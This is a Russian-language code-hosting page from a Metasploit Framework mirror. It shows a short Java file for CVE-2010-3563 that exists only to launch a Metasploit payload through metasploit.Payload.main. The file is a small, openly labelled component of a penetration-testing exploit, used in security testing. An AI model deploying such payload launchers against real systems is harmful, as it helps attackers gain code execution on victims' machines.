/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
external/source/exploits/CVE-2010-3563/Exploit.java
17 строк
275 B
James Lee
add an exploit for cve-2010-3563, thanks Matthias Kaiser
20 ноя 2010, 02:02
20 ноя 2010, 02:02
6f7af42
Код
Авторство
О чём код?
import metasploit.Payload; /** * * This class starts the metasploit payload. * @author mka * */ public class Exploit { public static void main(String[] args) { try { Payload.main(null); } catch (Exception e) { e.printStackTrace(); } } }